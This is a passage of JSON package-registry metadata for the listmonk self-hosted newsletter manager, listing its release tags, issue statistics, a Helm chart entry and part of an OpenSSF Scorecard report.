tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"f5dfb0cf62f1097545ff315a5c1d9ac540d54b9e","kind":"tag","published_at":"2024-10-28T07:47:30.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"3894571d1ac0b5baa5bcb15a173e4e1020d7a113","kind":"tag","published_at":"2024-10-27T13:25:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"f9120d9b80b1d0d86f27e3f23edfb2ffe6f5b091","kind":"tag","published_at":"2024-02-04T11:18:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v3.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0/manifests"},{"name":"v2.5.1","sha":"a6a2b6982036eb6bebf9a1ff4d58ff4937ea3af1","kind":"tag","published_at":"2023-08-15T15:46:37.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"ea2f93ea066bc612b1161ba76324c11c8e495933","kind":"tag","published_at":"2023-08-10T18:32:51.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0/manifests"},{"name":"v2.4.0","sha":"c668523c570519797e1e7f01958fe830378d253e","kind":"tag","published_at":"2023-03-20T13:48:00.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.4.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0/manifests"},{"name":"v2.3.0","sha":"448f0e3428535bc93bc942c9867183f5adcaf057","kind":"tag","published_at":"2022-11-27T17:50:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.3.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"bbbf28c5ce981738c485d6d0e94c89df0fef6763","kind":"tag","published_at":"2022-07-30T18:09:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"0ecfb89f19e63da44df393b08cd2b21f90c79605","kind":"tag","published_at":"2022-02-12T15:24:59.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"05585b701b56a9aa1f1a7f1cdadec44c19541055","kind":"tag","published_at":"2021-09-27T17:57:16.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0/manifests"},{"name":"v1.1.0","sha":"b3612927c82bee987c2c2d20322232b9144a3c8a","kind":"tag","published_at":"2021-06-09T14:43:46.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0/manifests"},{"name":"v1.0.0","sha":"95a81d17ced9766d40447364de12925b51c844fd","kind":"commit","published_at":"2021-05-16T11:24:55.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0/manifests"},{"name":"v0.9.0-beta","sha":"e90fb1d88d15aea4fc7028cd96b1a274f92ab05e","kind":"commit","published_at":"2021-02-13T12:41:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.9.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.9.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.9.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta/manifests"},{"name":"v0.8.0-beta","sha":"cde0b4b42a3e0e18b7e08d701e5ca4482cd6fe73","kind":"commit","published_at":"2020-11-10T16:51:25.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.8.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.8.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.8.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta/manifests"},{"name":"v0.7.0-alpha","sha":"0f055eacb87030b55970f4870ff3a0b22b0dcaef","kind":"commit","published_at":"2020-08-09T14:32:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.7.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.7.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.7.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha/manifests"},{"name":"v0.6.2-alpha","sha":"82702ed5bc64c4cbc567b561f187bc3f8abe83b5","kind":"commit","published_at":"2020-05-25T06:25:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.2-alpha/manifests"},{"name":"v0.6.1-alpha","sha":"18329ff052e62e74b9114d4e2126074c9845277b","kind":"commit","published_at":"2020-05-17T15:37:48.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.1-alpha/manifests"},{"name":"v0.6.0-alpha","sha":"cb331b93418eecaffdfcdcc38c91606328afdf47","kind":"commit","published_at":"2020-05-16T18:09:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.6.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.6.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.6.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.6.0-alpha/manifests"},{"name":"v0.5.2-alpha","sha":"b8d9ab10f29d8fc3c3dc0fcfb235ce453d8c58bf","kind":"commit","published_at":"2020-04-02T12:52:56.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.2-alpha/manifests"},{"name":"v0.5.1-alpha","sha":"21ffe5fb02256a6e391b5e2ebe11554badee5ee5","kind":"commit","published_at":"2020-04-01T14:29:41.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.1-alpha/manifests"},{"name":"v0.5.0-alpha","sha":"ad9ee7528d34ce19659a7aa963ada18baebddb0b","kind":"commit","published_at":"2020-03-08T10:40:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.5.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.5.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.5.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.5.0-alpha/manifests"},{"name":"v0.4.0-alpha","sha":"62aa31b14cf651084a76aba0021106fd78911081","kind":"commit","published_at":"2020-02-09T13:45:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.4.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.4.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.4.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.4.0-alpha/manifests"},{"name":"v0.3.3-alpha","sha":"9a88c2ed7b69bf020ccc95625788017f214a29c3","kind":"commit","published_at":"2020-02-06T10:09:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.3-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.3-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.3-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.3-alpha/manifests"},{"name":"v0.3.2-alpha","sha":"047de697707e4a3ea23b53c7a1917f20edc9f8c2","kind":"commit","published_at":"2020-02-05T12:39:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.2-alpha/manifests"},{"name":"v0.3.1-alpha","sha":"1064f1e4d8b1ef8d083f02254900b42c442e6e92","kind":"commit","published_at":"2020-01-19T15:19:01.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.1-alpha/manifests"},{"name":"v0.3.0-alpha","sha":"ccd354df3f85259a0b88dffe4a51586aab01135b","kind":"commit","published_at":"2019-10-31T06:31:13.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.3.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.3.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.3.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.3.0-alpha/manifests"},{"name":"v0.2.2-alpha","sha":"d8d7f88af357823778f468ee50deef0b49f0cd77","kind":"commit","published_at":"2019-09-10T07:26:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.2-alpha/manifests"},{"name":"v0.2.1-alpha","sha":"649d1b11f0d4d0c353f9682656514056d4e7d769","kind":"tag","published_at":"2019-08-26T18:16:32.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.1-alpha/manifests"},{"name":"v0.2.0-alpha","sha":"b63b31ec52f52e48b6b456134857c737340f29f6","kind":"commit","published_at":"2019-07-21T16:42:54.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.2.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.2.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.2.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.2.0-alpha/manifests"},{"name":"v0.1.2-alpha","sha":"275554e57e31d5bf4505e06101e1c69ef91293ed","kind":"commit","published_at":"2019-07-12T11:49:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.2-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.2-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.2-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.2-alpha/manifests"},{"name":"v0.1.1-alpha","sha":"3d3af8c429bd4f0d4936115e9becd45d3a6b77c0","kind":"commit","published_at":"2019-07-12T10:18:29.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.1-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.1-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.1-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.1-alpha/manifests"},{"name":"v0.1.0-alpha","sha":"9fd9748d4d02f708d311ddf7d6d3b308b575e24b","kind":"commit","published_at":"2019-07-09T11:36:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.1.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.1.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.1.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.1.0-alpha/manifests"}]},"repo_metadata_updated_at":"2026-08-28T07:01:53.705Z","dependent_packages_count":0,"downloads":0,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":0.0,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:helm/deliveryhero/listmonk","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/helm/deliveryhero/listmonk","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/helm/deliveryhero/listmonk","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/helm/deliveryhero/listmonk/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:04:41.213Z","issues_count":939,"pull_requests_count":436,"avg_time_to_close_issue":6047242.725731895,"avg_time_to_close_pull_request":1085166.282051282,"issues_closed_count":649,"pull_requests_closed_count":351,"pull_request_authors_count":192,"issue_authors_count":631,"avg_comments_per_issue":2.7401490947816827,"avg_comments_per_pull_request":1.1995412844036697,"merged_pull_requests_count":242,"bot_issues_count":0,"bot_pull_requests_count":73,"past_year_issues_count":99,"past_year_pull_requests_count":78,"past_year_avg_time_to_close_issue":3732101.7,"past_year_avg_time_to_close_pull_request":605370.9818181818,"past_year_issues_closed_count":40,"past_year_pull_requests_closed_count":55,"past_year_pull_request_authors_count":48,"past_year_issue_authors_count":84,"past_year_avg_comments_per_issue":1.6565656565656566,"past_year_avg_comments_per_pull_request":1.3205128205128205,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":21,"past_year_merged_pull_requests_count":24,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/issues","maintainers":[{"login":"knadh","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"},{"login":"mr-karan","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mr-karan"},{"login":"rhnvrm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rhnvrm"}],"active_maintainers":[{"login":"knadh","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knadh"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/deliveryhero%2Flistmonk/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/deliveryhero%2Flistmonk/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/deliveryhero%2Flistmonk/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/deliveryhero%2Flistmonk/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/deliveryhero%2Flistmonk/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages/deliveryhero%2Flistmonk/codemeta","maintainers":[],"registry":{"name":"artifacthub.io","url":"https://artifacthub.io","ecosystem":"helm","default":true,"packages_count":18199,"maintainers_count":0,"namespaces_count":5397,"keywords_count":10063,"github":"artifacthub","metadata":{"funded_packages_count":1011,"rate_limit":0.5},"icon_url":"https://github.com/artifacthub.png","created_at":"2026-01-29T12:56:41.438Z","updated_at":"2026-09-01T05:05:43.053Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/artifacthub.io/namespaces"}},{"id":14088826,"name":"listmonk-chart/listmonk","ecosystem":"helm","description":"Self-hosted newsletter and mailing list manager","homepage":"https://listmonk.app","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/knadh/listmonk","keywords_array":["listmonk","newsletter","email","mailing-list"],"namespace":"listmonk-chart","versions_count":1,"first_release_published_at":"2026-02-04T07:21:55.000Z","latest_release_published_at":"2026-02-04T07:21:55.000Z","latest_release_number":"2.0.1","last_synced_at":"2026-08-25T13:49:55.626Z","created_at":"2026-03-21T00:09:24.682Z","updated_at":"2026-08-26T08:27:50.277Z","registry_url":"https://artifacthub.io/packages/helm/listmonk-chart/listmonk","install_command":"helm repo add listmonk-chart https://redzumi.github.io/listmonk-chart \u0026\u0026 helm install listmonk listmonk-chart/listmonk","documentation_url":"https://artifacthub.io/packages/helm/listmonk-chart/listmonk","metadata":{"app_version":"v6.0.0","chart_version":"2.0.1","category":8,"official":false,"deprecated":false,"repository_url":"https://redzumi.github.io/listmonk-chart","maintainers":[]},"repo_metadata":{"id":37385001,"uuid":"193833307","full_name":"knadh/listmonk","owner":"knadh","description":"High performance, self-hosted, newsletter and mailing list manager with a modern dashboard. Single binary app.","archived":false,"fork":false,"pushed_at":"2026-08-22T08:24:51.000Z","size":52262,"stargazers_count":23109,"open_issues_count":109,"forks_count":2551,"subscribers_count":142,"default_branch":"master","last_synced_at":"2026-08-25T13:49:36.001Z","etag":null,"topics":["campaign","campaign-management","email-marketing","email-subscription","listmonk","mailing-list","newsletter","newsletter-management","newsletter-software","self-hosted","sms-gateway","smtp","transactional-emails"],"latest_commit_sha":null,"homepage":"https://listmonk.app","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/knadh.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2019-06-26T05:08:39.000Z","updated_at":"2026-08-25T13:22:53.000Z","dependencies_parsed_at":"2022-07-12T16:17:41.274Z","dependency_job_id":"71e3fe47-ce35-4f28-872a-148e180d6c82","html_url":"https://github.com/knadh/listmonk","commit_stats":null,"previous_names":[],"tags_count":42,"template":false,"template_full_name":null,"purl":"pkg:github/knadh/listmonk","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/sbom","scorecard":{"id":161421,"data":{"date":"2025-08-11","repo":{"name":"github.com/knadh/listmonk","commit":"38387d007926c2fbc3e0daaf15970dd3f5581f43"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.3,"checks":[{"name":"Code-Review","score":4,"reason":"Found 13/27 approved changesets -- score normalized to 4","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 6 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/build-sanity.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/github-pages.yml:12","Warn: no topLevel permission defined: 